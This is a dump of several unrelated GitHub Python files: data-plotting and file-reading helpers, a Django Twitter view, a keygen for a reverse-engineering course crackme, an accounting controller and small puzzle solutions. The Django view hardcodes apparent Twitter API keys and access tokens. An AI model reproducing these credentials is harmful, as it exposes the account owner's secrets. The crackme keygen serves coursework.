\"MetaPanda\"],\r\n subset: SelectorType,\r\n arrange: str = \"square\",\r\n plot_size: int = 3,\r\n shared_dist: str = \"auto\",\r\n savepath: Optional[Union[str, bool]] = None,\r\n **hist_kws\r\n):\r\n \"\"\"\r\n Plots a grid of histograms comparing the distributions in a MetaPanda\r\n selector.\r\n\r\n Parameters\r\n --------\r\n mdf : turb.MetaPanda\r\n The dataset\r\n subset : str or list/tuple of str\r\n Contains either types, meta column names, column names or regex-compliant strings\r\n arrange : str\r\n Choose from ['square', 'row', 'column']. Square arranges the plot as square-like as possible. Row\r\n prioritises plots row-like, and column-wise for column.\r\n plot_size : int, default=3\r\n The size of each axes\r\n shared_dist : str/tuple of str/dict, default=\"auto\"\r\n Determines what KDE to fit to the data, set to None if you don't want\r\n If tuple/list: attempts using these specified distributions\r\n If dict: maps column name (k) to distribution choice (v)\r\n savepath : None, bool, str\r\n saves the figure to file. If bool, uses the name in mdf, else uses given string. If None, no fig is saved.\r\n\r\n Other Parameters\r\n ----------------\r\n hist_kws : dict\r\n Keywords to pass to `turb.plot.histogram`\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n # checks\r\n instance_check(shared_dist, (type(None), str, list, tuple, dict))\r\n instance_check(savepath, (type(None), str, bool))\r\n nonnegative(plot_size, int)\r\n belongs(arrange, [\"square\", \"row\", \"column\"])\r\n # make a metapanda if we have a dataframe.\r\n _mdf = MetaPanda(mdf) if isinstance(mdf, DataFrame) else mdf\r\n\r\n # get selector\r\n selection = _mdf.view(subset)\r\n # assuming we've selected something...\r\n if selection.size > 0:\r\n fig, axes = gridplot(len(selection), arrange, ax_size=plot_size)\r\n\r\n if not isinstance(shared_dist, dict):\r\n for i, x in enumerate(selection):\r\n _ = histogram(\r\n _mdf[x].dropna(), ax=axes[i], title=x, kde=shared_dist, **hist_kws\r\n )\r\n fig.tight_layout()\r\n else:\r\n for i, (x, d) in enumerate(shared_dist.items()):\r\n _ = histogram(_mdf[x].dropna(), ax=axes[i], title=x, kde=d, **hist_kws)\r\n # iterate over any 'remaining' columns in selection and handle appropriately\r\n remaining = difference(selection, tuple(shared_dist.keys()))\r\n if remaining.shape[0] > 0:\r\n for i, x in enumerate(remaining):\r\n _ = histogram(\r\n _mdf[x].dropna(),\r\n ax=axes[i + len(shared_dist)],\r\n title=x,\r\n kde=\"auto\",\r\n **hist_kws\r\n )\r\n fig.tight_layout()\r\n\r\n if isinstance(savepath, bool):\r\n save(fig, \"hist\", _mdf.name_)\r\n elif isinstance(savepath, str):\r\n save(fig, \"hist\", _mdf.name_, fp=savepath)\r\n\r\n\r\ndef scatter_grid(\r\n mdf: Union[DataFrame, \"MetaPanda\"],\r\n x: SelectorType,\r\n y: SelectorType,\r\n arrange: str = \"square\",\r\n plot_size: int = 3,\r\n best_fit: bool = True,\r\n best_fit_deg: int = 1,\r\n savepath: Optional[Union[bool, str]] = None,\r\n):\r\n \"\"\"\r\n Plots a grid of scatter plots comparing each column for MetaPanda\r\n in selector to y target value.\r\n\r\n Parameters\r\n --------\r\n mdf : turb.MetaPanda\r\n The dataset\r\n x : str or list/tuple of str\r\n Contains either types, meta column names, column names or regex-compliant strings\r\n y : str or list/tuple of str\r\n Contains either types, meta column names, column names or regex-compliant strings\r\n arrange : str\r\n Choose from ['square', 'row', 'column']. Square arranges the plot as square-like as possible. Row\r\n prioritises plots row-like, and column-wise for column.\r\n plot_size : int\r\n The size of each axes\r\n best_fit : bool\r\n If True, draws a line of best fit\r\n best_fit_deg : int, default=1\r\n The degree of the line of best fit, can draw polynomial\r\n savepath : None, bool, str\r\n saves the figure to file. If bool, uses the name in mdf, else uses given string.\r\n\r\n Returns\r\n -------\r\n None\r\n \"\"\"\r\n from turbopanda.corr import bicorr\r\n\r\n # checks\r\n instance_check((plot_size, best_fit_deg), int)\r\n instance_check(savepath, (type(None), str, bool))\r\n instance_check(best_fit, bool)\r\n nonnegative(\r\n (\r\n best_fit_deg,\r\n plot_size,\r\n )\r\n )\r\n belongs(arrange, [\"square\", \"row\", \"column\"])\r\n\r\n # make a metapanda if we have a dataframe.\r\n _mdf = MetaPanda(mdf) if isinstance(mdf, DataFrame) else mdf\r\n\r\n # get selector\r\n x_sel = _mdf.view(x)\r\n y_sel = _mdf.view(y)\r\n # create a product between x and y and plot\r\n prod = list(it.product(x_sel, y_sel))\r\n\r\n if len(prod) > 0:\r\n fig, axes = gridplot(len(prod), arrange, ax_size=plot_size)\r\n for i, (_x, _y) in enumerate(prod):\r\n # pair x, y\r\n __x, __y = remove_na(_mdf[_x].values, _mdf[_y].values, paired=True)\r\n axes[i].scatter(__x.flatten(), __y, alpha=0.5)\r\n # line of best fit\r\n if best_fit:\r\n xn = np.linspace(__x.min(), __x.max(), 100)\r\n z = np.polyfit(__x.flatten(), __y, deg=best_fit_deg)\r\n axes[i].plot(xn, np.polyval(z, xn), \"k--\")\r\n\r\n # spearman correlation\r\n pair_corr = bicorr(_mdf[_x], _mdf[_y]).loc[\"spearman\", \"r\"]\r\n axes[i].set_title(\"r={:0.3f}\".format(pair_corr))\r\n axes[i].set_xlabel(_x)\r\n axes[i].set_ylabel(_y)\r\n\r\n fig.tight_layout()\r\n\r\n if isinstance(savepath, bool):\r\n save(fig, \"scatter\", _mdf.name_)\r\n elif isinstance(savepath, str):\r\n save(fig, \"scatter\", _mdf.name_, fp=savepath)\r\n","repo_name":"gregparkes/turbopanda","sub_path":"turbopanda/plot/_visualise.py","file_name":"_visualise.py","file_ext":"py","file_size_in_byte":6658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43405801758","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nimport requests\nfrom .models import usertwitx,friendtweet\nfrom django.db.models import Count\n\n\n# Home View\nclass HomeView(LoginRequiredMixin, TemplateView):\n template_name = \"home.html\"\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AdminPasswordChangeForm, PasswordChangeForm\nfrom django.contrib.auth import update_session_auth_hash\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\nfrom django.db import IntegrityError\n\nfrom social_django.models import UserSocialAuth\nimport tweepy\nimport json\n\nclass SettingsView(LoginRequiredMixin, TemplateView):\n def get(self, request, *args, **kwargs):\n user = request.user\n\n\n try:\n twitter_login = user.social_auth.get(provider='twitter')\n print(twitter_login.access_token)\n userid=twitter_login.access_token['user_id']\n screen_name=twitter_login.access_token['screen_name']\n\n auth = tweepy.OAuthHandler('okwoO0j3AxHqTTgvxH0Imb1OD','1iZgQDRs7IPv4HsUh36iHQuyBp3Ayn6g2l6iI83E8Hiu75NL3B')\n auth.set_access_token('1129150375720677377-ulmKDn7cD9YkbfSBykS5C2cBo4RHYp','f99siM42vcTDueq4treAVkquuJ80ptnP1li2Llr72lBVQ')\n api=tweepy.API(auth) \n tweets = api.user_timeline(screen_name=screen_name)\n\n\n friendl=api.friends(screen_name)\n\n\n listf=[]\n for friend in friendl:\n listf.append(friend.screen_name)\n\n \n\n try:\n response = requests.get('https://sleepy-ridge-86379.herokuapp.com/results?bm='+screen_name)\n parsed = response.json() #api for getting tweets\n except ValueError:\n parsed={}\n print(\"json error\")\n\n \n \n ff=api.get_user(userid) #to get a resizable profile pic\n profiler_photo=ff.profile_image_url_https\n\n uu=profiler_photo.replace('_normal','')\n print(ff.name)\n\n\n\n\n for i in range(0,len(parsed)): #looping through dict\n user_c=parsed[i][\"created_at\"]\n desc=parsed[i][\"text\"]\n url=\"https://twitter.com/geeksforgeeks/status/\"+str(parsed[i][\"id_str\"])\n\n try: #for catching integrity errros\n tw_inf=usertwitx(user_name=screen_name,tweet_id=parsed[i][\"id_str\"],user_c=user_c,desc=desc,url_p=url)\n tw_inf.save()\n\n except IntegrityError as e:\n print(\"duplicacy\")\n break\n\n \n\n\n for i in listf: #for following storage\n\n try:\n response2 = requests.get('https://sleepy-ridge-86379.herokuapp.com/results?bm='+i)\n parsed2 = response2.json() #api for getting tweets\n except ValueError:\n parsed2={}\n continue\n print(\"json error\")\n\n screen_namef=parsed2[0][\"user\"][\"screen_name\"]\n\n for i in range(0,len(parsed2)):\n\n desc2=parsed2[i][\"text\"]\n url2=\"https://twitter.com/geeksforgeeks/status/\"+str(parsed2[i][\"id_str\"])\n\n try: #for catching integrity errros\n tw_inf=friendtweet(friend_name=screen_namef,tweetf_id=parsed2[i][\"id_str\"],desc2=desc2,url_p2=url2)\n tw_inf.save()\n\n except IntegrityError as e:\n print(\"duplicacy\")\n break \n \n\n except UserSocialAuth.DoesNotExist:\n twitter_login = None\n\n\n can_disconnect = (user.social_auth.count() > 1 or user.has_usable_password())\n\n return render(request, 'core/settings.html', {\n\n 'twitter_login': twitter_login,\n 'profiler': ff,\n 'uu':uu,\n 'parsed': parsed,\n \n\n 'can_disconnect': can_disconnect\n })\n\n\n\n\ndef db_store_view(request): #database queries for rendering to frontend\n all_tweets=usertwitx.objects.all\n # print(type(all_tweets))\n a=usertwitx.objects.values_list('user_name').annotate(user_count=Count('user_name')).order_by('-user_count')\n size_m=len(a)\n total_tweets=0\n top=a[0][0]\n for p in a:\n total_tweets+=p[1] #total no of tweets saved\n\n print(total_tweets)\n\n\n friend_tweets=friendtweet.objects.all #db2 of following\n b=friendtweet.objects.values_list('friend_name').annotate(user2_count=Count('friend_name')).order_by('-user2_count')\n print(b)\n size_f=len(b)\n print(size_f)\n\n total_ftweets=0\n\n topf=b[0][0]\n\n for q in b:\n total_ftweets+=q[1] \n\n print(total_ftweets) \n \n return render(request,'db.html',{'all':all_tweets,'top':top,'total_tweets':total_tweets, 'total_master':size_m,'friend_tweets':friend_tweets,'size_f':size_f,'total_ftweets':total_ftweets,'topf':topf})\n\n","repo_name":"jainmayur517/assignment_fairdee","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5095397426","text":"# control flow 3\nimport random\n# our starting possible values\nvalues = list(range(ord('0'), ord('z')+1))\n# removed so we don't need to worry about escaping for this one\nvalues.remove(ord('`'))\n\n\nif __name__ == \"__main__\":\n # make sure the length is greater than or equal 16\n answer = random.choices(values, k=16)\n \n # rock()\n # paper()\n # lizard()\n # spock()\n while True:\n # rock\n one = random.choice(values)\n three = random.choice(values)\n five = random.choice(values)\n six_choices = list(filter(lambda x: x == one + three - five, values))\n\n if len(six_choices) == 0:\n continue\n\n answer[1] = one\n answer[3] = three\n answer[5] = five\n answer[6] = random.choice(six_choices)\n\n # paper\n six = answer[6]\n seven_choices = list(filter(lambda x: six ^ x < 0x03, values))\n if len(seven_choices) == 0:\n continue\n\n answer[7] = random.choice(seven_choices)\n\n # lizard()\n seven = answer[7]\n eight_choices = list(filter(lambda x: seven ^ x >= 0x04, values))\n if len(eight_choices) == 0:\n continue\n answer[8] = random.choice(eight_choices)\n\n\n # spock()\n eight = answer[8]\n nine_choices = list(filter(lambda x: eight != x, values))\n if len(nine_choices) == 0:\n continue\n answer[9] = random.choice(nine_choices)\n\n # spock() and scissors()\n # case1 \n # from scissors input[12] == input[10]\n case1 = list(filter(lambda x: (x < 0x03)\n and (x ^ answer[8] ^ answer[9]) != 1, values))\n\n if len(case1) > 0:\n answer[10] = random.choice(case1)\n answer[12] = answer[10]\n break\n\n # case2\n case2 = list(filter(lambda x: (x >= 0x03)\n and (x ^ answer[8] ^ answer[9]) != 0, values))\n \n if len(case2) > 0:\n answer[10] = random.choice(case2)\n answer[12] = answer[10]\n break\n \n # answer\n answer = ''.join(map(lambda x: chr(x), answer))\n print(\"answers:\",answer)","repo_name":"ltran1612/CS579-Reverse-Engineering","sub_path":"BinaryReverseEngineeringWithCrackmes/control_flow3_keygen.py","file_name":"control_flow3_keygen.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11749341013","text":"from collections import namedtuple\nfrom functools import lru_cache\n\nfrom sage.all import *\n\nfrom samsurf.triangle import Triangle, is_valid_barycentric_coordinate\nfrom samsurf.halfplane import HalfPlane\n\n\nclass Hinge:\n \"\"\" Two adjacent triangles where a hinge transformation could be performed.\n -\n :param tri: a Triangle\n :param id_edge: an edge vector, the shared edge identified by tri\n :param tri_opp: a Triangle, the triangle opposite tri\n :param id_edge_op: an edge vector, the shared edge identified by tri_opp\n id_edge and id_edge_op are tuples of (triangle id, edge id), not vectors\n\n - See document for examples of labeling tri, tri_opp and edges.\n \"\"\"\n def __init__(self, tri, id_edge, tri_opp, id_edge_opp):\n self.tri = tri\n self.id_edge = id_edge\n self.tri_opp = tri_opp\n self.id_edge_opp = id_edge_opp\n\n edge = tri[id_edge[1]]\n edge_opp = tri_opp[id_edge_opp[1]]\n\n if edge != -edge_opp:\n raise ValueError(\"Edges either nonparallel or improperly oriented\")\n\n v0 = tri[(id_edge[1] + 1) % 3]\n v1 = edge_opp\n v2 = -tri_opp[(id_edge_opp[1] - 1) % 3]\n\n self.vectors = (v0,v1,v2)\n\n @property\n def coordinates(self):\n return tuple(coord for vector in self.vectors for coord in vector)\n\n def __hash__(self):\n return hash((self.coordinates,))\n\n @classmethod\n def from_id_edge(cls, trin, id_edge):\n label_tri, label_edge = id_edge\n\n id_edge_opp = trin.gluings[id_edge]\n\n label_tri_opp, label_edge_opp = id_edge_opp\n\n tri = trin.triangles[label_tri]\n tri_opp = trin.triangles[label_tri_opp]\n\n return Hinge(tri, id_edge, tri_opp, id_edge_opp)\n\n @property\n def is_convex(self):\n v0, v1, v2 = self.vectors\n boundary = [v0, v1 - v0, v2 - v1, -v2]\n crosses = [w0x * w1y - w1x * w0y\n for (w0x, w0y), (w1x, w1y)\n in zip(boundary, boundary[1:] + boundary[:1])]\n\n all_positive = all(bool(cross > 0) for cross in crosses)\n all_negative = all(bool(cross < 0) for cross in crosses)\n\n return all_positive or all_negative\n\n @property\n def marked_cartesian_coords(self):\n v0, v1, v2 = self.vectors\n cartesian_coords_list = []\n\n change_of_basis_tri = column_matrix([v1, v0])\n id_edge_tri = self.id_edge[1]\n for bary_coord, color in self.tri.points_marked:\n partial_coord = (bary_coord[id_edge_tri], bary_coord[(id_edge_tri + 2) % 3])\n cartesian_coord = change_of_basis_tri * vector(partial_coord)\n cartesian_coords_list.append((cartesian_coord, color))\n\n change_of_basis_opp = column_matrix([v2,v1])\n id_edge_opp = self.id_edge_opp[1]\n for bary_coord, color in self.tri_opp.points_marked:\n partial_coord = (bary_coord[(id_edge_opp + 2) % 3], bary_coord[(id_edge_opp + 1) % 3])\n cartesian_coord = change_of_basis_opp * vector(partial_coord)\n cartesian_coords_list.append((cartesian_coord, color))\n\n return cartesian_coords_list\n\n def mark_cartesian_coord(self, cartesian_coord, color):\n tri = self.tri\n opp = self.tri_opp\n v0, v1, v2 = self.vectors\n\n change_of_basis_tri = column_matrix([v1, v0])\n id_edge_tri = self.id_edge[1]\n partial_coord = change_of_basis_tri**(-1) * vector(cartesian_coord)\n bary_coord_indexed = sorted([(id_edge_tri, partial_coord[0]),\n ((id_edge_tri + 1) % 3, 1 - partial_coord[0] - partial_coord[1]),\n ((id_edge_tri + 2) % 3, partial_coord[1])])\n bary_coord = tuple(coord for index, coord in bary_coord_indexed)\n if is_valid_barycentric_coordinate(*bary_coord):\n tri = tri.mark_point(bary_coord, color)\n\n change_of_basis_opp = column_matrix([v2, v1])\n id_edge_opp = self.id_edge_opp[1]\n partial_coord = change_of_basis_opp**(-1) * vector(cartesian_coord)\n bary_coord_indexed = sorted([(id_edge_opp, 1 - partial_coord[0] - partial_coord[1]),\n ((id_edge_opp + 1) % 3, partial_coord[1]),\n ((id_edge_opp + 2) % 3, partial_coord[0])])\n bary_coord = tuple(coord for index, coord in bary_coord_indexed)\n if is_valid_barycentric_coordinate(*bary_coord):\n opp = opp.mark_point(bary_coord, color)\n\n return Hinge(tri, self.id_edge, opp, self.id_edge_opp)\n\n def flip(self):\n \"\"\"Performs hinge flip and maintains the locations of marked points.\n -See document for how labeling is done.\"\"\"\n v0, v1, v2 = self.vectors\n\n # produce new side list maintaining order such that v1 is still v1\n sides_ordered = sorted([(self.id_edge[1], v0 - v2),\n ((self.id_edge[1] + 1) % 3, v1 - v0),\n ((self.id_edge[1] + 2) % 3, v2 - v1)])\n\n # produce new triangle tri from sides_ordered\n tri = Triangle(*(vector for _, vector in sides_ordered), [])\n\n sides_ordered = sorted([(self.id_edge_opp[1], v2 - v0),\n ((self.id_edge_opp[1] + 1) % 3, -v2),\n ((self.id_edge_opp[1] + 2) % 3, v0)])\n\n tri_opp = Triangle(*(vector for _, vector in sides_ordered), [])\n\n flipped_hinge = Hinge(tri, self.id_edge, tri_opp, self.id_edge_opp)\n\n for cartesian_coord, color in self.marked_cartesian_coords:\n flipped_hinge = flipped_hinge.mark_cartesian_coord(cartesian_coord - v0, color)\n\n return flipped_hinge\n\n @property\n def incircle_det(self):\n \"\"\"(p2 is inside/on/outside oriented circle 0-P0-P1) iff (det 0) \"\"\"\n return sage.all.matrix([[x, y, x ** 2 + y ** 2] for x, y in self.vectors]).determinant()\n\n @property\n @lru_cache(None)\n def _coefficients(self):\n (x0, y0), (x1, y1), (x2, y2) = self.vectors\n\n m02 = x1 * y2 - x2 * y1\n m12 = x0 * y2 - x2 * y0\n m22 = x0 * y1 - x1 * y0\n\n a = y0 ** 2 * m02 - y1 ** 2 * m12 + y2 ** 2 * m22\n b = 2 * (x0 * y0 * m02 - x1 * y1 * m12 + x2 * y2 * m22)\n c = x0 ** 2 * m02 - x1 ** 2 * m12 + x2 ** 2 * m22\n\n return a, b, c\n\n @property\n def halfplane(self):\n try:\n return HalfPlane.from_ineq(*self._coefficients)\n except ValueError:\n return None\n\n @property\n def triangle(self):\n return self.tri\n\n @property\n def triangle_opp(self):\n return self.tri_opp\n\n @property\n def ids_boundary(self):\n \"\"\"return the edge IDs of the boundary of the hinge\n starting in the NE and moving Clockwise\"\"\"\n\n label_tri, label_edge = self.id_edge\n label_tri_opp, label_edge_opp = self.id_edge_opp\n\n SE = (label_tri, (label_edge + 1) % 3)\n NE = (label_tri, (label_edge + 2) % 3)\n NW = (label_tri_opp, (label_edge_opp + 1) % 3)\n SW = (label_tri_opp, (label_edge_opp + 2) % 3)\n\n return NE, SE, SW, NW\n\n def plot(self):\n v0, v1, v2 = self.vectors\n vertices_t1 = [sage.all.zero_vector(2), v0, v1]\n vertices_t2 = [sage.all.zero_vector(2), v1, v2]\n return sage.all.polygon2d(vertices_t1, fill=False).plot() + sage.all.polygon2d(vertices_t2, fill=False).plot()\n","repo_name":"sfreedman67/samsurf","sub_path":"samsurf/hinge.py","file_name":"hinge.py","file_ext":"py","file_size_in_byte":7395,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"78"} +{"seq_id":"42557978253","text":"\"\"\"\nG/L Batch Numbering Management\n\"\"\"\n\n__author__ = 'Jaimy Azle'\n__version__ = '1.0'\n__copyright__ = 'Copyright (c) 2008 Jaimy Azle'\n\nfrom mvcsvc import *\nfrom elixir import *\nimport datetime as dt\nimport sqlalchemy as sa\nfrom validators import *\nfrom tbl import GLBCNO\n\nclass GLS070(MVCController):\n \"\"\"\n G/L Batch Numbering Management\n \"\"\"\n _description = 'G/L Batch Numbering Management'\n _supported_functions = (MVCFuncNew, MVCFuncOpen, MVCFuncShow, MVCFuncCopy, MVCFuncDelete)\n\n GLBCNOID = MVCField(MVCTypeList + MVCTypeField, String(3), label='Batch Code', charcase=ecUpperCase)\n GLBCNONM = MVCField(MVCTypeList + MVCTypeField, String(32), label='Description')\n GLBCMINO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Start From')\n GLBCMXNO = MVCField(MVCTypeList + MVCTypeField, Integer(), label='Max. No. Accepted')\n GLBCLSNO = MVCField(MVCTypeList + MVCTypeField, String(6), label='Last No. Used', enabled=False)\n\n def openView(self, mvcsession):\n q = GLBCNO.query\n q = q.order_by(sa.asc(GLBCNO.GLBCNOID))\n objs = q.all()\n\n for obj in objs:\n mvcsession.listDataset.Append()\n mvcsession.listDataset.SetFieldValue('GLBCNOID', obj.GLBCNOID)\n mvcsession.listDataset.SetFieldValue('GLBCNONM', obj.GLBCNONM)\n mvcsession.listDataset.SetFieldValue('GLBCMINO', obj.GLBCMINO)\n mvcsession.listDataset.SetFieldValue('GLBCMXNO', obj.GLBCMXNO)\n mvcsession.listDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO)\n mvcsession.listDataset.Post()\n return mvcsession\n\n def retrieveData(self, mvcsession):\n fields = mvcsession.listDataset.FieldsAsDict()\n if mvcsession.execType == MVCExecAppend:\n mvcsession.entryDataset.Append()\n mvcsession.entryDataset.SetFieldValue('GLBCMINO', 0)\n mvcsession.entryDataset.SetFieldValue('GLBCMXNO', 999999)\n mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % 0)\n mvcsession.entryDataset.Post()\n\n if mvcsession.execType in (MVCExecShow, MVCExecEdit, MVCExecDelete, MVCExecCopy):\n q = GLBCNO.query\n q = q.filter_by(GLBCNOID = fields['GLBCNOID'])\n obj = q.first()\n\n if (mvcsession.execType == MVCExecCopy):\n mvcsession.entryDataset.CopyFromORM(\n 'GLBCNONM;GLBCMINO;GLBCMXNO',\n 'GLBCNONM;GLBCMINO;GLBCMXNO',\n obj)\n mvcsession.entryDataset.Edit()\n mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO)\n mvcsession.entryDataset.Post()\n\n else:\n mvcsession.entryDataset.CopyFromORM(\n 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO',\n 'GLBCNOID;GLBCNONM;GLBCMINO;GLBCMXNO',\n obj)\n mvcsession.entryDataset.Edit()\n mvcsession.entryDataset.SetFieldValue('GLBCLSNO', '%.6d' % obj.GLBCLSNO)\n mvcsession.entryDataset.Post()\n\n if mvcsession.execType == MVCExecEdit:\n mvcsession.fieldDefs.GLBCNOID.enabled = False\n return mvcsession\n\n def postData(self, mvcsession):\n fields = mvcsession.entryDataset.FieldsAsDict()\n validators.NotEmpty(messages={'empty': 'Batch code must not empty'}).to_python(fields['GLBCNOID'])\n validators.NotEmpty(messages={'empty': 'Batch code name must not empty'}).to_python(fields['GLBCNONM'])\n if (fields['GLBCMINO'] is None) or (fields['GLBCMINO'] < 0):\n raise Exception('Minimum batch no must not empty or negative value, at least should be assign with 0')\n if (fields['GLBCMXNO'] is None) or (fields['GLBCMXNO'] > 999999):\n raise Exception('Minimum batch no must not empty or larger than 999999')\n\n q = GLBCNO.query\n q = q.filter_by(GLBCNOID = fields['GLBCNOID'])\n obj = q.first()\n\n td = dt.datetime.now()\n if (mvcsession.execType in (MVCExecAppend, MVCExecCopy)):\n if obj:\n raise Exception('Duplicate record found')\n\n rec = GLBCNO(\n GLBCNOID = fields['GLBCNOID'],\n GLBCNONM = fields['GLBCNONM'],\n GLBCMINO = fields['GLBCMINO'],\n GLBCMXNO = fields['GLBCMXNO'],\n GLBCLSNO = fields['GLBCMINO'],\n GLBCAUDT = td.date().tointeger(),\n GLBCAUTM = td.time().tointeger(),\n GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8')\n )\n if not session.transaction_started():\n session.begin()\n try:\n session.save(rec)\n session.commit()\n except:\n session.rollback()\n session.expunge(rec)\n raise\n if (mvcsession.execType == MVCExecEdit):\n if not obj:\n raise Exception('Record could not be found')\n if fields['GLBCMINO'] > obj.GLBCLSNO:\n raise Exception('Starting Batch No must be smaller or equal with last batch no used')\n if fields['GLBCMXNO'] < obj.GLBCLSNO:\n raise Exception('Starting Batch No must be greater or equal with last batch no used')\n mvcsession.entryDataset.CopyIntoORM(\n 'GLBCNONM;GLBCMINO;GLBCMXNO',\n 'GLBCNONM;GLBCMINO;GLBCMXNO',\n obj)\n obj.GLBCAUDT = td.date().tointeger()\n obj.GLBCAUTM = td.time().tointeger()\n obj.GLBCAUUS = mvcsession.cookies['user_name'].encode('utf8')\n if not session.transaction_started():\n session.begin()\n try:\n session.update(obj)\n session.commit()\n except:\n session.rollback()\n session.expunge(obj)\n raise\n\n if (mvcsession.execType == MVCExecDelete):\n if not obj:\n raise Exception('Record could not be found')\n if not session.transaction_started():\n session.begin()\n try:\n session.delete(obj)\n session.commit()\n except:\n session.rollback()\n raise\n return mvcsession\n\n\n\n","repo_name":"jazlee/csp-accounting","sub_path":"ecf/mvc/GLS070/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41881219992","text":"f = open(\"input.txt\", 'r').readlines()\n\nres = 0\n\nfor i in range(len(f)):\n row = list(map(int, list(f[i].strip())))\n\n for j, val in enumerate(row):\n if val == 9:\n continue\n\n if i > 0 and val >= int(f[i-1][j]):\n continue\n\n if i < len(f)-1 and val >= int(f[i+1][j]):\n continue\n\n if j > 0 and val >= row[j-1]:\n continue\n\n if j < len(row)-1 and val >= row[j+1]:\n continue\n\n res += val + 1\n\nprint(res)\n","repo_name":"Marina-Banov/Advent-of-Code","sub_path":"2021/09A.py","file_name":"09A.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26536265561","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"Handles basic import functions.\"\"\"\r\n\r\n# future imports\r\nfrom __future__ import absolute_import, division, print_function\r\n\r\n# locals\r\nimport glob\r\nfrom typing import List, Optional, Union\r\n\r\nfrom ._metapanda import MetaPanda\r\nfrom turbopanda._dependency import is_joblib_installed\r\nfrom .utils import instance_check, join\r\n\r\n\r\ndef read(\r\n filename: str, name: Optional[Union[str, List[str]]] = None, **kwargs\r\n) -> Union[MetaPanda, List[MetaPanda]]:\r\n \"\"\"Reads in a data source from file and creates a MetaPanda object from it.\r\n\r\n .. note:: multiple files are returned in 'alphabetical order'.\r\n\r\n\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n A relative/absolute link to the file, with extension provided.\r\n Accepted extensions: {'csv'', 'xls', 'xlsx', 'sql', 'json', 'pkl'}\r\n .json is a special use case and will use the MetaPanda format.\r\n .pkl is a pickable object which will use `joblib` to load in.\r\n name : str/list of str, optional\r\n Name to use for the MetaPanda, else `filename` is used.\r\n If `list`, this is sorted to alphabetically match `filename`.\r\n Not compatible with .pkl file types.\r\n kwargs : dict, optional\r\n Additional args to pass to pd.read_MetaPanda()\r\n\r\n Raises\r\n ------\r\n IOException\r\n If the no `filename` are selected, or `filename` does not exist\r\n ValueException\r\n If `filename` has incorrect file type ending\r\n\r\n Returns\r\n -------\r\n mdf : (list of) MetaPanda\r\n A MetaPanda object. Returns a list of MetaPanda if `filename` is glob-like and\r\n selects multiple files.\r\n \"\"\"\r\n # checks\r\n instance_check(filename, str)\r\n instance_check(name, (type(None), str, list, tuple))\r\n\r\n # use the glob package to allow for unix-like searching. Sorted alphabetically\r\n glob_name = sorted(glob.glob(filename))\r\n if len(glob_name) == 0:\r\n raise IOError(\"No files selected with filename {}\".format(filename))\r\n else:\r\n # maps the file type to a potential pandas function.\r\n pandas_types = (\"csv\", \"xls\", \"xlsx\", \"sql\")\r\n extra_types = (\"json\", \"pkl\")\r\n\r\n def ext(s):\r\n \"\"\"Extracts the file extension (in lower)\"\"\"\r\n return s.rsplit(\".\", 1)[-1].lower()\r\n\r\n def fetch_db(fl, n=None):\r\n \"\"\"Fetches the appropriate datafile set.\"\"\"\r\n if ext(fl) in pandas_types:\r\n return MetaPanda.from_pandas(fl, n, **kwargs)\r\n elif ext(fl) == \"json\":\r\n return MetaPanda.from_json(fl, name=n, **kwargs)\r\n elif ext(fl) == \"pkl\":\r\n # check if joblib is loaded\r\n if is_joblib_installed(raise_error=True):\r\n import joblib\r\n return joblib.load(fl)\r\n else:\r\n raise ValueError(\r\n \"file ending '.{}' not recognized, must end with {}\".format(\r\n fl, join(pandas_types, extra_types)\r\n )\r\n )\r\n\r\n if isinstance(name, (list, tuple)):\r\n ds = list(map(fetch_db, glob_name, sorted(name)))\r\n elif isinstance(name, str):\r\n ds = [fetch_db(f, name) for f in glob_name]\r\n else:\r\n ds = list(map(fetch_db, glob_name))\r\n # if we have more than one element, return the list, else just return ds\r\n return ds if len(ds) > 1 else ds[0]\r\n","repo_name":"gregparkes/turbopanda","sub_path":"turbopanda/_fileio.py","file_name":"_fileio.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14353860940","text":"from operator import ne\nimport os\nimport time\nimport random\nimport math\nfrom random import randint\n\n\ndef random_int_fill_list(size, limfrom, limto):\n new_list = []\n for i in range(size):\n new_list.append(randint(limfrom, limto))\n return new_list\n\n\ndef random_float_fill_list(size):\n new_list = []\n for i in range(size):\n new_list.append(round(random.random() * 10, 2))\n return new_list\n\ndef check_for_enter_error():\n while True:\n numb = input('Введите любое целое положительное число больше 0: ')\n if numb.isdigit():\n numb = int(numb)\n if numb == 0:\n os.system('cls' if os == 'nt' else 'clear')\n print('Число должно быть больше 0! Повторите ввод!')\n else: break\n else: \n os.system('cls' if os == 'nt' else 'clear')\n print('Ошибка ввода!') \n return int(numb)\n\ndef fib(n):\n if n in [1, 2]:\n return 1\n elif n == -1:\n return 1\n elif n == -2:\n return -1\n elif n > 0:\n return fib(n - 1) + fib(n - 2)\n elif n < -2:\n return fib(n + 1) + fib(n + 2)\n elif n == 0:\n return 